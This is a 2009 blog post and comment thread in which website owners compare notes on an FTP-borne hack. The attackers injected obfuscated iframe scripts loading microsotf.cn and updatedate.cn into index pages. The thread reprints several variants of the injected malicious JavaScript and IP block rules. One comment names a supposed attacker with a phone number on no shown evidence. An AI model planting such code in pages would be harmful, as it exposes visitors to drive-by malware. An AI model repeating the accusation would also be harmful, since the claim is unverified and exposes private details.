Web site hack loading microsotf.cn

Filed Under Hacks and Mods on 2009-07-06, 15:21

I came back from vacation to find that some of my sites had been compromised. If you’re also someone who has websites that have been compromised with an iframe loading microsotf.cn, please join the conversation on freenode (chat.freenode.com) in #microsotf.cn If you don’t have an irc client, you can use the webchat. Here are some symptoms that hopefully Google will index and help you find this post:

The inserted code:

echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>';

The syntax error that appears:

Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ',' or ';'

It appears the affected files are index.php index.html and login.php.

This is the IP you should block the hell out of: 91.212.198.37


Comments

  • ET
    I'm in the clear too so far.
  • Oliver
    Day 5 and I think I am in the clear :) :) :)
  • ET
    Day 4 for me too
    setting permissions in Filezilla (index pages now 644), cleaning out the bad script in index pages, blocking IP, updating Adobe Acrobat Reader, changing passwords (although that didn't work in the past), disabling anonymous FTP in CPanel for Bluehost clients, doing scans with AGV and Malwarebytes (scanning never found anything in the past though), turning "register_globals" to "Off" in my php.ini file for my online store--I think those are all the steps I took. One step I didn't take yet but will is to update Cubecart for my online store. Not many people are posting anymore so I wonder if this hacker is busted.
  • Oliver
    Day 4 and still clean...I think my solution worked :)
  • Oliver
    Day 3 and still untouched
  • ET
    Oliver,
    Thank you for your answer. I will take those steps. I get so nervous too. My heart drops when I see that stupid script in my client's index pages.
  • Oliver
    The site is actually mine and it is a Vbulletin site. There is no virus anywhere because the script was supposed to redirect anyone that clicked on it to another site with the virus on it. Unfortunately for whoever wrote the code, Vbulletin only interpreted it as a Parse error and would show you which file the error was on and which line of code.
    This is what shows up as the error where ** is my site directory:

    *Parse error*: syntax error, unexpected ';', expecting T_VARIABLE or '$' in* /**/**/**/showthread.php* on line* 352*
  • Oliver
    Day 2 and site is still untouched even though I see many hits from IP's in China, Russia, Kazakhstan, Norway and many others. Fingers are crossed and I get nervous every time I click on my site.
  • ET
    Oliver,
    How did you disable your FTP accounts? Within the CPanel of the hosts?
  • Oliver
    Actually I disabled anonymous FTP and deleted an FTP account of one of my admins. Checking through the logs, I found that his account was the one that had been used to access the server files so it is quite possible that his computer had been compromised. I did all these actions through the hosts Cpanel.
  • ET
    In repsonse to this: "I found that his account was the one that had been used to access the server files so it is quite possible that his computer had been compromised." Does that mean that your client now has this virus and he needs to take all the measures you did to secure his computer and/or site?
  • Oliver
    The only way I have found to stop this is to disable all FTP accounts. That has solved all my problems but again, I am sure this is not an option for most of you. Sorry
  • ET
    My client needs her site fixed and I can not figure out how this hacker is getting in. Her site is plain html and I'm using Filezilla. AVG and Malwarebytes are not finding it. Now google is saying this when you type in her site in google "this site my harm your computer". This is just aweful. Now I have to deal with google. I've had her change her password and I stopped ftping her index page for a week but the hack keeps coming back. I also learned today to set permissions in Filezilla by right clicking on the index page but I don't know if that will work yet. I also blocked IP addresses today (91.212.198.37, correct)? I also talked with her hosting for a long time and they told me to go to safeweb.norton.com and enter microsotf.cn to see what comes up and I did that and 2 viruses were listed but that doesn't help me. Is the only way to solve this by switching to SFTP? How do you even do that? Should I do a system restore? Is there anyone who can answer my questions?
  • Oliver
    Forgot to mention that alot of these attacks are from China
  • Oliver
    I removed all FTP access from my site and the problem is solved. This is fine with me as nobody needs FTP for my site. Unfortunately for some of you, this isn't the case but it seems this is definitely an FTP issue.
  • Spencer
    This has happened a few times on my sites, and have had a read through your comments.

    I have not used Filezilla, only used Dreamweaver's built in FTP program. It has attached my ASP and PHP files, and now links to http://vipprojects.cn.

    The hosting company says its down to script vulnerabilities in my site. Any suggestions, as this seems like something that doesn't want to go away!
  • cindy
    Hi, I posted 2 weeks ago and I'm checking in to see what problems are still circling, or if there are new variants of the updatedate.cn. My websites that were infected were the ones to which I had recently uploaded changes. Other sites were not compromised if I hadn't touched them. I'm using Dreamweaver FTP.

    I also somehow had a backdoor setup/ trojan downloader, the fake security alert problem, and finally, porn sites popping open on my machine. It was horrible. My other machine got infected from visiting a site that had the sheur virus and it was nasty to get rid of it. I think I got every bad hack within the 2-week period beginning July 3.

    So far, with the changed passwords on all FTP accounts, the sites are fine. It's been 2 weeks. I still check them all nervously though.
  • ET
    Some of my Web clients got infected so I had them all change their passwords. I use Filezilla to FTP. I thought that the common denominator was Filezilla but other posters FTP'd using other programs. I had my web client change her password and I never found out what she changed it to and have not FTP'd her files since the new password and she got hacked again. So we do know that changing passwords doesn't work. But someone wrote and said you must get the virus out of your computer first before you deal with changing passwords. According to the above post, is this the virus?: fin Sheur2 Trojan. Should I stop using Filezilla and instead use Dreamweaver to FTP?
  • Guest
    Okay, I've run just about every spyware program around and found a few infections on my main computer.

    However, I also noticed that one site I had connected to using SFTP was not effected while the ones I used Filezilla or dreamweaver (with FTP) were effected.

    Have switched to SFTP on everything and am keeping fingers crossed. Hope this helps anyone with the problem and would appreciate hearing more from people who have fixed the issue. From the number of posters that have stopped posting, it looks like they may have fixed this.
  • Nick
    This spyware affects all files that have common filenames.

    index, main, default, home, and more I assume.

    I use globalscape cuteftp and all of my sites that I access on a normal basis were infected.

    Some sites were crawled by google and categorized as malicious.

    Even some sites that I did not access recently were infected.

    I have to assume that it is a spyware that reads FTP logs/saved passwords on your computer, then later on FTPs in with admin access and overwrites a bunch of files.

    Clean PC.
    Change FTP passwords.
    Re-upload indexes.
  • Guest
    Nick,

    Did you find a specific virus or trojan on your computer? Trying to figure out if more than my FTP was compromised. I had the updatedate .cn code on one index, but they entered into at least one other site which I can't find any changes on. It had hackersafe running on it, not sure if that was a deterrant or not, but they did avoid those sites.
  • Nick
    Spybot was unable to find and remove it.

    I fixed it by doing a system restore and THEN a scan. It found a lot of stuff, but as usual, most of it is weird cookie stuff so I didn't pay attention to any specifics.

    I manually deleted a few files in the system32 directory.

    When I was infected, I had all sorts of problems, including a new desktop background saying I was infected. All these issues were rectified by system restore.

    I would just check all files that have index* in their name and see if anything was changed. Or, do a search on your server for files changed within certain dates.

    I have a theory, that it disguises itself as an adobe update or a java update, one of those.
  • Dan
    They changed my index.php file as well as adding some subdirectories that looked like they should exist. Things like /language and /js were showing up as sub folders with a bunch of crap that they shouldn't have.

    I would suggest upgrading your wordpress install and then deleting everything from the directory trees and files that do not have a modified date of the day you ran the update. Save a few files like the wp-config.php and your upload directory.

    I had to do that a few times to catch everything along with change my FTP passwords on all my sites and then I blocked specific IP addresses that were generating bad traffic to my site. I then had to manually edit all the index.php files and remove the extra script tags it added to the bottoms of each page. After all that finally it has been 3 weeks and I think I might be free!
  • Guest
    Where have you guys found infections? I only found the code on the index file of the main site. Did anyone find hidden snippets in wordpress files or any database intrusions? Also, from my FTP logs, it only looks like they were signed in briefly. It appeared the index file was the only one pulled.

    Lastly, if a trojan is found, do you have to reformat the comp or just pull the infection?
  • brainasium
    @Name. I used WS-FTP and still got the problem. I don't believe its just a FileZilla problem.
  • brainasium
    Appears that there is a variant updatedate.cn. I have cleaned up my files 4 times already. Changed ftp passwords. Changed root password Unfortunately I cannot use SFTP cause the damn host doesnt support it. Chrome and Firefox continue to give Malware warnings on exploited pages. Terrible for business.
  • Dan
    Does anyone have LiberKey installed on a pen drive??? That;s where i found some viruses and trojan horses including the one mentioned above.
  • Name
    I posted the reply two above this one. I found the solution. What happens is you get a virus, and it steals your Filezilla history file. I have 4 computers, and around 10 ftp accounts on differnt domains/servers. We had 4 sites hit on personal server, and on my work server 2 accounts where hit. I was the only one that logged into those sites. On my computers only 1 had logged into the 2 work ftp accounts. Thatc omputer was compromised. I did a virus scan and came up with nothing in AVG, however, I rescanned with NOD32 and it discovered a fin Sheur2 Trojan.

    That trojan I have linked to the stolen Filezilla file. I have since formated that computer, and all is well. Make sure you change all FTPs AFTER removing the virus. But thats the easiest way to determine which PC was hit if you have multiple, match the access log to the Filezilla history.
  • Guest
    I got hacked around the 13th. They entered and put the code in the index file of one site, though they got into a second account and did not change the code. I was using Filezilla at the time and didn't have wordpress updated to the latest edition.

    I went ahead and blocked IPs, but was wondering if any of the earlier posters have had any success in getting rid of these SOBs via password changes, shift to SFTP etc.
    Thanks in advance for any help
  • Name
    What exactly is causing this? Some douchebag modified index files in 6 of our sites, logging into FTP with the correct password for EACH site. Each site uses a different, completely random password.
  • Phil
    Who here is using Filezilla and got this hack? Raise your hand.

    *Raises hand* ..

    here's a post I made on another blog:

    Ok, about 8 of my websites were hit by this microsotf.cn iFrame script. And here’s the really troubling part: the code was inserted not just into index.php files, but also into TEMPLATE files located in a separate (non browsable) directory. Could be because the affected template files are called main.html, so some automated process thought it was an index equivalent, but much more lamely it could mean that there is live (human) intervention into the code-installation process.

    I fixed all of the files, reset my ftp password, and have had two of my sites re-hacked since then.

    This is the first I’ve heard about the possibility of FTP password files being compromised by malware or what-have-you, so I will try deleting all those saved passwords, resetting passwords on the server side (again), and maybe even switching ftp clients (right now I use Filezilla).

    Just out of curiosity, WHO HERE IS USING FILEZILLA AND HAS BEEN HACKED? Raise your hand!

    *Raises hand*

    There’s gotta be some pattern.

    -Phil
  • I was using Filezilla on the machine that was compromised. This is definitely one of the targeted FTP clients.
  • Name
    This malware affected each website I worked on during the last week. Sites I didn't update were not affected. I replaced all the affected index files last night and continue to monitor the index date-stamps via FTP.

    I found this morning that the bugger re-infected 2 of 4 previously infected sites. The script was re-introduced to the 2 websites where I *did not* yet change the password. Now I've changed the FTP password on those as well; hopefully it's done!!!
  • C4talyst
    Blocking ip's is worthless at stopping this...CHANGE YOUR FTP PASSWORDS. Better yet, stop using ftp...use sftp.
  • Name
    Just pulled the latest code from a site which contains updatedate.cn which is live and waiting with an empty site.
  • Dan
    This hit all 3 of my sites and has been driving me nuts to clear. I used cpanel to deny IP's to the ones you listed and I have taken out that awesome script from my index.php files and hopefully it is gone forever!
  • Name
    D'Oh! I meant second line, sorry :blush:
  • Name
    Shouldn't that first iptables line be:-

    iptables -A INPUT -m iprange --src-range 68.161.247.0-68.161.247.255 -j DROP

    ?
  • flandercan
    Hi,

    I run a number of servers and only found this hack on an SMF forum on one of the accounts. The files are being changed using FTP I have lots of evidence in my logs,

    Im using Ubuntu servers and used the following command to find all the altered files,

    > grep -r kPvOkYUlTEBvLmAPjYUP *

    Also used iptables to block the IP's seen in logs (Yes more than one)

    258 iptables -A INPUT -m iprange --src-range 91.212.198.0-91.212.198.255 -j DROP
    259 iptables -A INPUT -m iprange --src-range 68.161.24.0-68.161.24.255 -j DROP
    260 iptables -A INPUT -m iprange --src-range 91.212.19.0-91.212.19.255 -j DROP

    91.212.198.x - Goes back to a linux or unix boxs
    68.161.247.75 - Goes back to a MS2003 Small business server (And looks like its owned by www.euromediapartners.co.uk) although their web server is on a different ddress.

    I found the hack in index.php, main.php, index.html and login.php

    FTP log shows these ips attacking a specific account to get the password then over approx 1 week accessing the site every day at different times.

    Thanks
    Paul Flanders
    www.fcconsultancy.co.uk
  • acenterprise
    http://rockymountainenvironmental.com/
    07/04/09 --- 8:16am
    Altered files: index.htm, index.html, default.asp, main.html
    Offending Code: <script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2>');</script><script>document.write("<if"+'ra'+"m"+'e s'+"rc=\"h"+'tt'+"p:"+''+"/"+'/mic'+"roso"+'t'+'f.c'+"n"+'/'+"\" wid"+'th=1 he'+"igh"+'t'+"="+"2>');</script><script>document.write("<"+"i"+"f"+"ram"+"e sr"+"c=\"h"+"t"+"tp"+":"+"/"+"/tr"+"ught"+""+"s"+"a.c"+"o"+"m/\" wid"+"th=1 he"+"ight"+"="+"2></if"+"r"+"a"+""+"me>");</script>
    The Script failed to redirect due to conflict between my script call and my arguments. Repaired files 07/06/09 after discovery.

    07/09/09 --- 6:11AM
    NEW OFFENDING CODE
    <script>eval("d((*)&!o$^!%c$[[^@&um((*)&!e$[[^@&n[@&%^t.w$[[^@&r((*)&!i((*)&!t$^!%e(&@)&]('(&@)&]</((*)&!i$[[^@&f((*)&!r$^!%a$^!%m((*)&!e>'$^!%)$[[^@&;[@&%^".replace(/\(\&\@\)\&\]|\$\^\!\%|\(\(\*\)\&\!|\$\[\[\^\@\&|\[\@\&\%\^/ig, ""))</script>
    This redirect bypassed my script calls and proceeded to download malware.
    Malware: [braviax (fakealeart Trojan)]& [ID12 Undetermined self replicating virus]
    I have closed down any server-side includes that are not necessary, changed passwords, and contacted Web.com to block IP as I as a client don't have access or admin rights to .htaccess. Best of luck to all.
    REDIRECT ADDRESSES: (Do not Use: http://updatedate.cn) OR
    (Do not Use: http://microsotf.cn )
    (Allen)
  • Guest
    ace,

    have you had any problems after removing the trojans? What did you do to clear your computer?

    Also, have you switched from unsecure FTP to SFTP, changed computers, etc?
  • Randy
    The safe side is to block all their servers from 91.212.*.*, unless of course you do regular business with the russian students' bots. ;-)
  • Randy
    Seems to be originating from the Academy of Sciences, Federation of Russia Their equivalent to our ITT Tech) using their campus servers in Kazakstan and Latvia before running through the European Union then jumping the Atlantic to here. The student is Nevdomskiy Alexey Alexeevich and can be reached at +79024883214
  • Darren
    I am having the same issue with our company site, is there a permanent fix for this?
  • if you have a server admininstrator contact them. If you're on a shared hosting plan, contact them, and click the link below for a tutorial on blocking IPs using htaccess.

    http://www.clockwatchers.com/htaccess_block.html
  • Little bastard crawled through my sites and hit most of them - sites spread across three servers. Makes me wonder what the endgame is - malware, fake traffic, etc...dicks.

    Thanks for the post.
  • Eddie H
    Mine too. I have restored my original index.html and index.php files, but a few hours later, the sites are hacked again. I have my files all set to 644, yet how are they continuing to hack in? Nasty bugger!
blog comments powered by Disqus
Blog Network:
Blog Networks